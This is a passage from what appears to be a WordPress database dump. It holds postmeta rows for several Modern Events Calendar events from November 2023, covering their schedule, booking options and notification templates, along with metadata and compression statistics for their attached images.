1-16'),(194221,269262,'mec_start_time_hour','7'),(194222,269262,'mec_start_time_minutes','0'),(194223,269262,'mec_start_time_ampm','PM'),(194224,269262,'mec_start_day_seconds','68400'),(194225,269262,'mec_end_date','2023-11-16'),(194226,269262,'mec_end_time_hour','8'),(194227,269262,'mec_end_time_minutes','0'),(194228,269262,'mec_end_time_ampm','PM'),(194229,269262,'mec_end_day_seconds','72000'),(194230,269262,'mec_repeat_status','0'),(194231,269262,'mec_repeat_type',''),(194232,269262,'mec_repeat_interval','1'),(194233,269262,'mec_repeat_end',''),(194234,269262,'mec_repeat_end_at_occurrences','9'),(194235,269262,'mec_repeat_end_at_date',''),(194236,269262,'mec_advanced_days','a:0:{}'),(194237,269262,'mec_in_days',''),(194238,269262,'mec_not_in_days',''),(194239,269262,'mec_hourly_schedules','a:0:{}'),(194240,269262,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(194241,269262,'mec_tickets','a:0:{}'),(194242,269262,'mec_fees_global_inheritance','1'),(194243,269262,'mec_fees','a:0:{}'),(194244,269262,'mec_ticket_variations_global_inheritance','1'),(194245,269262,'mec_ticket_variations','a:0:{}'),(194246,269262,'mec_reg_fields_global_inheritance','1'),(194247,269262,'mec_reg_fields','a:0:{}'),(194248,269262,'mec_bfixed_fields','a:0:{}'),(194249,269262,'mec_op','a:0:{}'),(194250,269262,'mec_fields','a:0:{}'),(194251,269262,'mec_event_status','EventScheduled'),(194252,269262,'mec_moved_online_link',''),(194253,269262,'mec_cancelled_reason',''),(194254,269262,'mec_display_cancellation_reason_in_single_page',''),(194255,269262,'boldgrid_hide_page_title','0'),(194256,269262,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(194257,269262,'passster_activate_global_protection',NULL),(194258,269262,'passster_activate_protection',NULL),(194259,269262,'passster_protection_type','password'),(194260,269262,'boldgrid_in_page_containers','1'),(194274,269262,'_dp_original','267696'),(194262,269262,'passster_area_shortcode',''),(194263,269262,'_wp_old_date','2023-01-14'),(194264,269262,'mec_cost_auto_calculate','0'),(194265,269262,'mec_style_per_event','global'),(194266,269262,'mec_trailer_url',''),(194267,269262,'mec_trailer_title',''),(194268,269262,'mec_start_datetime','2023-11-16 07:00 PM'),(194269,269262,'mec_end_datetime','2023-11-16 08:00 PM'),(194270,269262,'mec_sequence','17'),(194271,269262,'mec_event_gallery','a:0:{}'),(194272,269262,'mec_related_events','a:0:{}'),(194273,269262,'mec_banner','a:0:{}'),(194275,269262,'_edit_lock','1698505019:15'),(194276,269262,'_edit_last','2'),(194280,269264,'_wp_attached_file','2023/10/waterfall-illus-2.jpg'),(194281,269264,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:798;s:6:\"height\";i:449;s:4:\"file\";s:29:\"2023/10/waterfall-illus-2.jpg\";s:8:\"filesize\";i:158705;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"waterfall-illus-2-348x196.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38774;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"waterfall-illus-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19723;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:29:\"waterfall-illus-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:114978;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:29:\"waterfall-illus-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40941;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:29:\"waterfall-illus-2-500x449.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:449;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83273;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:29:\"waterfall-illus-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63552;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:29:\"waterfall-illus-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48064;}s:8:\"tileview\";a:5:{s:4:\"file\";s:29:\"waterfall-illus-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46369;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(194282,269262,'_thumbnail_id','269264'),(194283,269264,'original-file','2023/10/waterfall-illus-2-updraft-pre-smush-original.jpg'),(194284,269264,'smush-complete','1'),(194285,269264,'smush-info','The file was compressed from 154.99 KB to 107.85 KB, saving 30.41 percent, using WP-Optimize'),(194286,269264,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:158705;s:12:\"smushed-size\";i:110441;s:15:\"savings-percent\";d:30.410000000000000142108547152020037174224853515625;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:158705;s:10:\"compressed\";i:110441;}s:6:\"medium\";a:2:{s:8:\"original\";i:38774;s:10:\"compressed\";i:26511;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:19723;s:10:\"compressed\";i:9597;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:114978;s:10:\"compressed\";i:92181;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:40941;s:10:\"compressed\";i:28282;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:83273;s:10:\"compressed\";i:65784;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:63552;s:10:\"compressed\";i:48197;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:48064;s:10:\"compressed\";i:34785;}s:8:\"tileview\";a:2:{s:8:\"original\";i:46369;s:10:\"compressed\";i:33042;}}}'),(194289,269265,'protect_children',''),(194290,269265,'mec_color',''),(194291,269265,'mec_location_id','118'),(194292,269265,'mec_dont_show_map','0'),(194293,269265,'mec_organizer_id','1'),(194294,269265,'mec_read_more',''),(194295,269265,'mec_more_info',''),(194296,269265,'mec_more_info_title',''),(194297,269265,'mec_more_info_target','_self'),(194298,269265,'mec_cost',''),(194299,269265,'mec_currency','a:0:{}'),(194300,269265,'mec_additional_organizer_ids','a:0:{}'),(194301,269265,'mec_additional_location_ids','a:0:{}'),(194302,269265,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-11-18\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-11-18\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(194303,269265,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(194304,269265,'mec_certain_weekdays','a:0:{}'),(194305,269265,'mec_allday','0'),(194306,269265,'one_occurrence','0'),(194307,269265,'mec_hide_time','0'),(194308,269265,'mec_hide_end_time','0'),(194309,269265,'mec_comment',''),(194310,269265,'mec_timezone','global'),(194311,269265,'mec_countdown_method','global'),(194312,269265,'mec_public','1'),(194313,269265,'mec_start_date','2023-11-18'),(194314,269265,'mec_start_time_hour','1'),(194315,269265,'mec_start_time_minutes','0'),(194316,269265,'mec_start_time_ampm','PM'),(194317,269265,'mec_start_day_seconds','46800'),(194318,269265,'mec_end_date','2023-11-18'),(194319,269265,'mec_end_time_hour','2'),(194320,269265,'mec_end_time_minutes','0'),(194321,269265,'mec_end_time_ampm','PM'),(194322,269265,'mec_end_day_seconds','50400'),(194323,269265,'mec_repeat_status','0'),(194324,269265,'mec_repeat_type',''),(194325,269265,'mec_repeat_interval','1'),(194326,269265,'mec_repeat_end',''),(194327,269265,'mec_repeat_end_at_occurrences','9'),(194328,269265,'mec_repeat_end_at_date',''),(194329,269265,'mec_advanced_days','a:0:{}'),(194330,269265,'mec_in_days',''),(194331,269265,'mec_not_in_days',''),(194332,269265,'mec_hourly_schedules','a:0:{}'),(194333,269265,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(194334,269265,'mec_tickets','a:0:{}'),(194335,269265,'mec_fees_global_inheritance','1'),(194336,269265,'mec_fees','a:0:{}'),(194337,269265,'mec_ticket_variations_global_inheritance','1'),(194338,269265,'mec_ticket_variations','a:0:{}'),(194339,269265,'mec_reg_fields_global_inheritance','1'),(194340,269265,'mec_reg_fields','a:0:{}'),(194341,269265,'mec_bfixed_fields','a:0:{}'),(194342,269265,'mec_op','a:0:{}'),(194343,269265,'mec_fields','a:0:{}'),(194344,269265,'mec_event_status','EventScheduled'),(194345,269265,'mec_moved_online_link',''),(194346,269265,'mec_cancelled_reason',''),(194347,269265,'mec_display_cancellation_reason_in_single_page',''),(194348,269265,'boldgrid_hide_page_title','0'),(194349,269265,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(194350,269265,'passster_activate_global_protection',NULL),(194351,269265,'passster_activate_protection',NULL),(194352,269265,'passster_protection_type','password'),(194353,269265,'boldgrid_in_page_containers','1'),(194367,269265,'_dp_original','267696'),(194355,269265,'passster_area_shortcode',''),(194356,269265,'_wp_old_date','2023-01-14'),(194357,269265,'mec_cost_auto_calculate','0'),(194358,269265,'mec_style_per_event','global'),(194359,269265,'mec_trailer_url',''),(194360,269265,'mec_trailer_title',''),(194361,269265,'mec_start_datetime','2023-11-18 01:00 PM'),(194362,269265,'mec_end_datetime','2023-11-18 02:00 PM'),(194363,269265,'mec_sequence','18'),(194364,269265,'mec_event_gallery','a:0:{}'),(194365,269265,'mec_related_events','a:0:{}'),(194366,269265,'mec_banner','a:0:{}'),(194368,269265,'_edit_lock','1698266844:2'),(194369,269265,'_edit_last','2'),(194370,269266,'_wp_attached_file','2023/10/sunset-sea-2.jpg'),(194371,269266,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:808;s:6:\"height\";i:454;s:4:\"file\";s:24:\"2023/10/sunset-sea-2.jpg\";s:8:\"filesize\";i:117837;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"sunset-sea-2-350x196.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26309;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"sunset-sea-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13778;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"sunset-sea-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82843;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:24:\"sunset-sea-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29936;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:24:\"sunset-sea-2-500x454.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:454;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64663;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:24:\"sunset-sea-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45562;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:24:\"sunset-sea-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33645;}s:8:\"tileview\";a:5:{s:4:\"file\";s:24:\"sunset-sea-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35771;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1491075842\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"32\";s:13:\"shutter_speed\";s:18:\"0.0083333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(194372,269265,'_thumbnail_id','269266'),(194373,269266,'original-file','2023/10/sunset-sea-2-updraft-pre-smush-original.jpg'),(194374,269268,'protect_children',''),(194375,269268,'mec_color',''),(194376,269268,'mec_location_id','118'),(194377,269268,'mec_dont_show_map','0'),(194378,269268,'mec_organizer_id','1'),(194379,269268,'mec_read_more',''),(194380,269268,'mec_more_info',''),(194381,269268,'mec_more_info_title',''),(194382,269268,'mec_more_info_target','_self'),(194383,269268,'mec_cost',''),(194384,269268,'mec_currency','a:0:{}'),(194385,269268,'mec_additional_organizer_ids','a:0:{}'),(194386,269268,'mec_additional_location_ids','a:0:{}'),(194387,269268,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-11-01\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-11-01\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(194388,269268,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(194389,269268,'mec_certain_weekdays','a:0:{}'),(194390,269268,'mec_allday','0'),(194391,269268,'one_occurrence','0'),(194392,269268,'mec_hide_time','0'),(194393,269268,'mec_hide_end_time','0'),(194394,269268,'mec_comment',''),(194395,269268,'mec_timezone','global'),(194396,269268,'mec_countdown_method','global'),(194397,269268,'mec_public','1'),(194398,269268,'mec_start_date','2023-11-01'),(194399,269268,'mec_start_time_hour','7'),(194400,269268,'mec_start_time_minutes','0'),(194401,269268,'mec_start_time_ampm','PM'),(194402,269268,'mec_start_day_seconds','68400'),(194403,269268,'mec_end_date','2023-11-01'),(194404,269268,'mec_end_time_hour','8'),(194405,269268,'mec_end_time_minutes','0'),(194406,269268,'mec_end_time_ampm','PM'),(194407,269268,'mec_end_day_seconds','72000'),(194408,269268,'mec_repeat_status','0'),(194409,269268,'mec_repeat_type',''),(194410,269268,'mec_repeat_interval','1'),(194411,269268,'mec_repeat_end',''),(194412,269268,'mec_repeat_end_at_occurrences','9'),(194413,269268,'mec_repeat_end_at_date',''),(194414,269268,'mec_advanced_days','a:0:{}'),(194415,269268,'mec_in_days',''),(194416,269268,'mec_not_in_days',''),(194417,269268,'mec_hourly_schedules','a:0:{}'),(194418,269268,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(194419,269268,'mec_tickets','a:0:{}'),(194420,269268,'mec_fees_global_inheritance','1'),(194421,269268,'mec_fees','a:0:{}'),(194422,269268,'mec_ticket_variations_global_inheritance','1'),(194423,269268,'mec_ticket_variations','a:0:{}'),(194424,269268,'mec_reg_fields_global_inheritance','1'),(194425,269268,'mec_reg_fields','a:0:{}'),(194426,269268,'mec_bfixed_fields','a:0:{}'),(194427,269268,'mec_op','a:0:{}'),(194428,269268,'mec_fields','a:0:{}'),(194429,269268,'mec_event_status','EventScheduled'),(194430,269268,'mec_moved_online_link',''),(194431,269268,'mec_cancelled_reason',''),(194432,269268,'mec_display_cancellation_reason_in_single_page',''),(194433,269268,'boldgrid_hide_page_title','0'),(194434,269268,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(194435,269268,'passster_activate_global_protection',NULL),(194436,269268,'passster_activate_protection',NULL),(194437,269268,'passster_protection_type','password'),(194438,269268,'boldgrid_in_page_containers','1'),(194452,269268,'_dp_original','267696'),(194440,269268,'passster_area_shortcode',''),(194441,269268,'_wp_old_date','2023-01-14'),(194442,269268,'mec_cost_auto_calculate','0'),(194443,269268,'mec_style_per_event','global'),(194444,269268,'mec_trailer_url',''),(194445,269268,'mec_trailer_title',''),(194446,269268,'mec_start_datetime','2023-11-01 07:00 PM'),(194447,269268,'mec_end_datetime','2023-11-01 08:00 PM'),(194448,269268,'mec_sequence','15'),(194449,269268,'mec_event_gallery','a:0:{}'),(194450,269268,'mec_related_events','a:0:{}'),(194451,269268,'mec_banner','a:0:{}'),(194453,269268,'_edit_lock','1698267253:2'),(194454,269266,'smush-complete','1'),(194455,269266,'smush-info','The file was compressed from 115.08 KB to 89.13 KB, saving 22.54 percent, using WP-Optimize'),(194456,269266,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:117837;s:12:\"smushed-size\";i:91272;s:15:\"savings-percent\";d:22.53999999999999914734871708787977695465087890625;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:117837;s:10:\"compressed\";i:91272;}s:6:\"medium\";a:2:{s:8:\"original\";i:26309;s:10:\"compressed\";i:18190;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13778;s:10:\"compressed\";i:6697;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:82843;s:10:\"compressed\";i:71388;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:29936;s:10:\"compressed\";i:21724;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:64663;s:10:\"compressed\";i:55125;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:45562;s:10:\"compressed\";i:36335;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:33645;s:10:\"compressed\";i:25418;}s:8:\"tileview\";a:2:{s:8:\"original\";i:35771;s:10:\"compressed\";i:27093;}}}'),(194457,269268,'_edit_last','2'),(194458,269269,'_wp_attached_file','2023/10/birds-chain-3.jpg'),(194459,269269,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:849;s:6:\"height\";i:445;s:4:\"file\";s:25:\"2023/10/birds-chain-3.jpg\";s:8:\"filesize\";i:82271;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"birds-chain-3-350x183.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17117;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"birds-chain-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6940;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"birds-chain-3-768x403.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59876;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:25:\"birds-chain-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21179;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:25:\"birds-chain-3-500x445.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:445;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46099;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:25:\"birds-chain-3-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33251;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:25:\"birds-chain-3-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24122;}s:8:\"tileview\";a:5:{s:4:\"file\";s:25:\"birds-chain-3-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24830;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(194460,269268,'_thumbnail_id','269269'),(194461,269269,'original-file','2023/10/birds-chain-3-updraft-pre-smush-original.jpg'),(194462,269269,'smush-complete','1'),(194463,269269,'smush-info','The file was compressed from 80.34 KB to 76.59 KB, saving 4.67 percent, using 